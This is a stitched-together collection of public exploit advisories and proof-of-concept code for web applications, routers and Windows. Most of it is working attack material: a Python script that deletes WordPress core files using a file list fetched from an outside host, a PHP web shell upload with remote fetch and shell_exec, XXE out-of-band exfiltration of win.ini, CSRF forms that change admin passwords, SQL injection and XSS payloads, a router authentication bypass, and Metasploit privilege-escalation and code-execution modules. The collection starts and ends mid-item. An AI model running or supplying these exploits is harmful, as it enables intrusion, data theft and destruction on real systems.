Parameter(s): row_number (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E
Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Parameter(s): keyword (GET)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"
#########################################################################
# [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin
# [+] http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587
# [+] Multiple Vulnerabilities Found by: Mukarram Khalid
# [+] https://mukarramkhalid.com/wordpress-real-3d-flipbook-plugin-exploit/
# [+] Requirements : Python 3.4.x or higher, Requests Module
# [+] Timeline: Vuln Found : 01-07-2016, Reported to Vendor: 03-07-2016
########################################################################
import os, json, base64
try:
import requests
except:
exit('[-] Importing Requests module failed')
class wpFlipbook:
''' Wordpress 3d flipbook plugin exploit '''
headers = {'User-agent' : 'Mozilla/11.0'}
payload1 = {'deleteBook' : ''}
payload2 = {'imgbase' : '', 'bookName' : '../../../', 'pageName' : 'makman'}
payload3 = {'action' : 'delete', 'bookId' : '<script>alert(/makman/)</script>'}
imageUrl = 'http://makman.tk/makman.jpg'
wpFilesUrl = 'http://makman.tk/wpFiles.json'
def __init__(self, url):
url = url.rstrip('/')
if 'http://' in url or 'https://' in url:
self.url = url
else:
self.url = 'http://' + url
def http(self, url, data = {}, post = False):
try:
if post:
r = requests.post(url, data = data, headers = self.headers, timeout = 20)
else:
r = requests.get(url, params = data, headers = self.headers, timeout = 20)
except:
exit('[-] Something went wrong. Please check your internet connection')
return r
def deleteFiles(self):
print('[+] Loading Wordpress file structure')
r = self.http(self.wpFilesUrl)
wpFiles = json.loads(r.text)
print('[+] Wordpress File structure loaded successfully')
print('[+] Creating directory real3dflipbook')
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)
print('[+] Deleting Files from wp-includes/ & wp-admin/')
for wpFile in wpFiles['wpFiles']:
print(' [+] Deleting File ' + wpFile)
self.payload1['deleteBook'] = wpFile
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
print('[+] Files have been deleted successfully')
def uploadImage(self):
print('[+] Loading image file')
r = self.http('http://makman.tk/makman.jpg')
encodedImage = base64.b64encode(r.content)
self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')
print('[+] Uploading image file in target root directory')
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')
def xss(self):
print('[+] Checking XSS payload')
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
if self.payload3['bookId'] in r.text:
print('[+] Found XSS here :')
print(' [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])
#########################################################################################################
def banner():
os.system('cls' if os.name == 'nt' else 'clear')
tabs = ' '
print(tabs + '*******************************************************************')
print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin *')
print(tabs + '* [+] Multiple Vulnerabilities Found by: *')
print(tabs + '* [+] https://mukarramkhalid.com *')
print(tabs + '*******************************************************************\n\n')
def main():
banner()
url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ')
exploit = wpFlipbook(url)
exploit.deleteFiles()
exploit.uploadImage()
exploit.xss()
print('[+] Done')
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit('\n[-] CTRL-C detected.\n')
# End
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==========================
www.k5n.us/webcalendar.php
Product:
==================
WebCalendar v1.2.7
WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.
WebCalendar can be setup in a variety of ways, such as...
A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.
Vulnerability Type:
======================
CSRF PROTECTION BYPASS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
WebCalendar attempts to uses the HTTP Referer to check that requests are
originating from same server as we see below.
From WebCalendar "include/functions.php" file on line 6117:
////////////////////////////////////////////////////////////
function require_valide_referring_url ()
{
global $SERVER_URL;
if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
// Missing the REFERER value
//die_miserable_death ( translate ( 'Invalid referring URL' ) );
// Unfortunately, some version of MSIE do not send this info.
return true;
}
if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
// Gotcha. URL of referring page is not the same as our server.
// This can be an instance of XSRF.
// (This may also happen when more than address is used for your server.
// However, you're not supposed to do that with this version of
// WebCalendar anyhow...)
die_miserable_death ( translate ( 'Invalid referring URL' ) );
}
}
/////////////////////////////////////////////////////////////////////////////////////////
However, this can be easily defeated by just not sending a referer. HTML 5
includes a handy tag <meta name="referrer" content="none"> to omit the
referer
when making an HTTP request, currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send
no referrer
and the vulnerable application will then happily process our CSRF requests.
Exploit code(s):
===============
1) CSRF Protection Bypass to change Admin password POC. Note: Name of the
victim user is required for success.
<meta name="referrer" content="none">
<form id="CSRF" action="
http://localhost/WebCalendar-1.2.7/edit_user_handler.php" method="post">
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567" />
<input name="upassword2" id="newpass2" type="password" value="1234567" />
</form>
2) CSRF Protection Bypass modify access controls under "System Settings" /
"Allow public access"
<meta name="referrer" content="none">
<form id="CSRF_ACCESS_CTRL" action="
http://localhost/WebCalendar-1.2.7/admin.php" method="post"
name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y" />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>
#######################################################
Vulnerability Type:
======================
PHP Code Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Since WebCalendars install script is not removed after installation as
there is no "automatic" removal of it, low privileged users can inject
arbitrary
PHP code for the "Database Cache" directory value as no input validation
exists for this when a user installs the application using the WebCalendar
walk
thru wizard.
If WebCalendars installation script is available as part of a default
image, often as a convenience by some hosting providers, this can be used
to gain
code execution on the target system. The only item that is required is the
user must have privileges to authenticate to the MySQL Database and to run
the
install script. So, users who have install wizard access for the
WebCalendar application will now have ability to launch arbitrary system
commands on the
affected host.
One problem we must overcome is WebCalendar filters quotes " so we cannot
use code like <?php echo "/bin/cat /etc/passwd"; ?> However, we can defeat
this
obstacle using the all to forgotten backtick `CMD` operator!.
e.g.
*/?><?php echo `/bin/cat /etc/passwd`; ?>
This results in "settings.php" being injected like...
<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>
Exploitation steps(s):
=====================
1) Login to the WebCalendar Installation Wizard.
2) When you get to WebCalendar Installation Wizard Step 2 of the install
script.
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2
3) Click "Test Settings" button to ensure connection to the Database.
4) Enter below PHP code for the "Database Cache Directory:" input fields
value to pop calculator for POC (Windows).
*/?><?php exec(`calc.exe`); ?>
5) Click "Next" button
6) Click "Next" button
7) Click "Save settings" button
BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.
If you happen to get following error when clicking "Test Settings" button,
"Failure Reason: Database Cache Directory does not exist", just click back
button then forward or just "Test settings" button again to try get past
the error.
Disclosure Timeline:
===============================
Vendor Notification: No replies
July 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
#!/usr/bin/python
# недействительный 31337 Team
# p4yl04d = https://bethebeast.pl/?p=953 [[::ch4n6e 1p::]]
import requests
import json
from requests.auth import HTTPBasicAuth
url = 'http://192.168.1.152:8080/tiki/vendor_extra/elfinder/php/connector.minimal.php'
headers = {
'Host': '192.168.1.152:8080',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Content-Type': 'multipart/form-data; boundary=_Part_1337'
}
payload = (
'--_Part_1337\n'
'Content-Disposition: form-data; name="cmd"\n\n'
'upload\n'
'--_Part_1337\n'
'Content-Disposition: form-data; name="target"\n\n'
'l1_Lw\n'
'--_Part_1337\n'
'Content-Disposition: form-data; name="upload[]"; filename="evil.php"\n'
'Content-Type: application/octet-stream)\n\n'
'/*<?php /**/ error_reporting(0); if (isset($_REQUEST["fupload"])) { file_put_contents($_REQUEST["fupload"], file_get_contents("http://192.168.1.10/" . $_REQUEST["fupload"]));};if (isset($_REQUEST["fexec"])) { echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";};\n'
'--_Part_1337--\n'
)
# If your target uses authentication then use:
# upload = requests.post(url, headers=headers, data=payload, auth=('admin', 'admin'))
upload = requests.post(url, headers=headers, data=payload)
# Exploit Title: php Real Estate Script Arbitrary File Disclosure
# Date: 2016-07-08
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.realestatescript.eu/
# Version: v.3
# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip
Exploit :
<?php
//read db config file
$post_data = 'tpl=../../private/config/db.php';//change read file path
$host = "www.server.local";//change victim address
$socket = fsockopen($host, 80, $errno, $errstr, 15);
if(!$socket){
echo ' error: ' . $errno . ' ' . $errstr;
die;
}else{
//change [demo/en] path server
$path = "/demo/en/";
$http = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
$http .= "Host: $host\r\n";
$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$http .= "Content-length: " . strlen($post_data) . "\r\n";
$http .= "Connection: close\r\n\r\n";
$http .= $post_data . "\r\n\r\n";
fwrite($socket, $http);
$contents = "";
while (!feof($socket)) {
$contents .= fgets($socket, 4096);
}
fclose($socket);
$e = explode('Content-Type: text/html',$contents);
print $e[1];
}
?>
CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval
Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition
Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
event logging, hibernation mode, internal reports and analysis,
remote management, and more.
Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability using the DTD parameter entities
technique resulting in disclosure and retrieval of arbitrary
data on the affected node via out-of-band (OOB) attack. The
vulnerability is triggered when input passed to the xmlservice
servlet using the ppbe.xml script is not sanitized while parsing the
xml inquiry payload returned by the JAXB element translation.
================================================================
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------
94: private InquirePayload splitInquirePayload(InputStream paramInputStream)
95: throws RequestException
96: {
97: try
98: {
99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102: return (InquirePayload)localJAXBElement.getValue();
103: }
104: catch (JAXBException localJAXBException)
105: {
106: localJAXBException.printStackTrace();
107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108: }
109: }
---
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------
28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>
================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 EN
Microsoft Windows 8
Microsoft Windows Server 2012
Linux (64bit)
MacOS X 10.6
Jetty(7.5.0.v20110901)
Java/1.8.0_91-b14
SimpleHTTP/0.6 Python/2.7.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php
22.06.2016
--
C:\data\xxe.xml:
----------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">
Request:
--------
POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>
Response:
---------
C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
######################
# Application Name : Streamo - Online Radio And Tv Streaming CMS
# Google Dork : inurl:rjdetails.php?id=
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://rexbd.net/
# Vulnerable Type : SQL Injection
# Date : 2016-07-08
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/menu.php
http://localhost/[path]/programs.php
http://localhost/[path]/rjdetails.php
######################
# Vulnerable code :
$gid = $_GET["id"];
######################
# PoC Exploit:
http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY
---
######################
# Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download
# Date: 11-07-2016
# Software Link: https://tiki.org
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Using `flv_stream.php` file from `vendor` directory we can download any file.
http://security.szurek.pl/tiki-wiki-cms-150-arbitrary-file-download.html
File: tiki-15.0\vendor\player\flv\flv_stream.php
<?php
session_cache_limiter('nocache');
header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
header('Pragma: no-cache');
$position = $_GET['position'];
$filename = dirname(__FILE__).'/'.htmlspecialchars($_GET['file']);
if (file_exists($filename)) {
header('Content-Type: video/x-flv');
if ($position != 0) {
echo 'FLV', pack('CCNN', 1, 1, 9, 9);
}
$file = fopen($filename, "rb");
fseek($file, $position);
while (!feof($file)) {
echo fread($file, 16384);
}
fclose($file);
} else {
echo 'The file does not exist';
}
?>
2. Proof of Concept
Example for downloading database configuration:
http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0
3. Solution:
Update to version 15.1
Timeline:
01-06-2016: Discovered
01-06-2016: Vendor notified
08-06-2016: Version 15.1 released, issue resolved
'''
# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
# Date: 5/11/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.belkin.com
# Version: Firmware: 1.00.27
# Tested on:F9K1113 v1
#1. Description:
#The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side
#authentication after you attempt to login after already having failed a login. That webpage, loginpserr.stm contains the md5 hash value of the administrators password. This can be
#exploited by extracting that hash value, and passing it in the pws field in a post request to
#login.cgi.
#I would like to note that I contacted Belkin on several occasions
#and gave them plenty of time to reply/fix the issue before releasing this entry.
#2. Proof:
#Line 55 of loginpserr.stm contains the javascript code:
#var password = "md5hashofpassword";
#3. Exploit:
'''
#!/usr/bin/python
import urllib
import urllib2
import sys
router = raw_input('Enter IP address of your AC1200 to test: ')
page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()
test_page = page
vuln_string = 'var password = "'
if vuln_string in test_page:
print 'Router is vulnerable.'
answer = raw_input('Would you like to exploit the target? Y/N : ')
else:
print 'Router is not vulnerable.'
print 'exiting...'
sys.exit()
if (answer == 'y') or (answer == 'Y'):
extract = test_page.split(vuln_string, 1)[1] #These two lines extract the leaked hash value
_hash = extract.partition('"')[0] #from /loginpserr.stm using quotes as a delimiter
else:
if (answer == 'n') or (answer == 'N'):
print 'exiting...'
sys.exit()
#Assemble the POST request to /login.cgi
headers = {
'Host': router,
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' : 'en-US,en;q=0.5',
'Accept-Encoding' : 'gzip, deflate',
'Referer' : 'http://'+router+'/',
'Connection': 'keep-alive',
'Content-Type': 'application/x-www-form-urlencoded'
}
data = {
'totalMSec':'0',
'pws': _hash,
'url':'status.stm',
'arc_action':'login',
'pws_temp': ''
}
data = urllib.urlencode(data)
#Sends the POST request with the hash in the pws field
req = urllib2.Request('http://'+router+'/login.cgi', data, headers)
response = urllib2.urlopen(req)
the_page = response.read()
print 'Exploit successful.'
print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'
Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin
David Vaartjes
Abstract
A stored Cross-Site Scripting vulnerability was found in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.
Tested versions
This issue was successfully tested on the All in One SEO Pack WordPress Plugin version 2.3.6.1.
Fix
This issue has been fixed in version 2.3.7 of the plugin.
Introduction
All in One SEO Pack is reportedly the most downloaded plugin for WordPress. It allows users to automatically optimize their site for Search Engines. A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality.
Details
A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the Admin dashboard by just visiting the public site with a malformed User Agent or Referrer header.
The SEO Pack Bot Blocker functionality can be used to prevent certain bots from accessing/crawling the website. Bots can be detected based on User Agent and Referrer header patterns. When the User Agent contains one of the pre-configured list of bot names like "Abonti", "Bullseye" or "Exabot" the request is blocked and a 404 is returned.
If the "Track Blocked Bots" setting is enabled (not by default), blocked request are logged in that HTML page without proper sanitization or output encoding, allowing XSS.
The affected resource: /all-in-one-seo-pack/modules/aioseop_bad_robots.php
if ( $this->option_isset( 'block_bots' ) ) {
if ( !$this->allow_bot() ) {
status_header( 503 );
$ip = $_SERVER['REMOTE_ADDR'];
-> $user_agent = $_SERVER['HTTP_USER_AGENT'];
-> $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched user agent %s found in blocklist.",
-> 'all-in-one-seo-pack' ), $ip, $user_agent ) );
exit();
} elseif ( $this->option_isset( 'block_refer' ) && $this->is_bad_referer() ) {
status_header( 503 );
$ip = $_SERVER['REMOTE_ADDR'];
-> $referer = $_SERVER['HTTP_REFERER'];
-> $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched referer %s found in blocklist.",
-> 'all-in-one-seo-pack' ), $ip, $referer ) );
}
}
The resulting HTML code:
<span class="aioseop_option_input"><div class="aioseop_option_div" ><pre>2016-07-05 18:59:37 Blocked bot with IP 172.16.232.1 -- matched user agent Abonti </pre><script>alert(1);</script>found in blocklist.
Proof of concept
1/ Go to the "Bad Bot Blocker" settings page in All in one SEO menu.
2/ Enable "Block Bad Bots using HTTP" and/or "Block Referral Spam using HTTP".
3/ Send exploit request (with payload in referer or user-agent) to the server. Anywhere. Make sure to send your exploit request as an anonymous user. When you are logged in (have cookies), you are never seen as a bot.
4/ If all set up ok, your request will be blocked (HTTP/1.1 503 Service Unavailable)
5/ Open the "Bad Bot Blocker" settings page as WP admin.
6/ Your payload will run, since it is logged in a <pre> tag.
Potential use "Track Blocked Bots" setting to show/hide the <pre> block. Not needed for payload to run. Payload can be set in User-Agent or Referer field
REQUEST:
GET / HTTP/1.1
Host: 172.16.232.130
User-Agent: Abonti </pre><script>alert(1);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.232.130/</pre><script>alert(1);</script>
Connection: close
Cache-Control: max-age=0
RESPONSE:
HTTP/1.1 503 Service Unavailable
Date: Tue, 05 Jul 2016 19:31:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
'Description' => %q{
This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn
a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
the specified payload within the context of the elevated process.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tamas Koczka', # Original Exploit
'William Webb <william_webb[at]rapid7.com>' # C port and Metasploit module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => 'false'
},
'Targets' =>
[
[ 'Windows 7 SP1', { } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2016-0051' ],
[ 'MSB', 'MS16-016' ]
],
'DisclosureDate' => 'Feb 09 2016',
'DefaultTarget' => 0
}))
end
def check
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
print_status("Launching notepad to host the exploit...")
notepad_process_pid = cmd_exec_get_pid("notepad.exe")
begin
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
print_status("Operation failed. Hosting exploit in the current process...")
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
library_path = ::File.expand_path(library_path)
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected ... injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
thread = process.thread.create(exploit_mem + offset, payload_mem)
sleep(3)
print_status("Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
inline request processor of the Ruby on Rails ActionPack component.
This vulnerability allows an attacker to process ERB to the inline
JSON processor, which is then rendered, permitting full RCE within
the runtime, without logging an error condition.
},
'Author' =>
[
'RageLtMan <rageltman[at]sempervictus>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-2098' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Mar 1 2016',
'DefaultOptions' => {
"PrependFork" => true
},
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
], self.class)
end
def json_request
code = Rex::Text.encode_base64(payload.encoded)
return {
datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
}.to_json
end
def exploit
print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json'
},
'data' => json_request
}, 25)
end
end
Persistent Cross-Site Scripting in WordPress Activity Log plugin
Han Sahin
Abstract
A stored Cross-Site Scripting (XSS) vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin.
Tested versions
This issue was successfully tested on WordPress Activity Log plugin version 2.3.1.
Fix
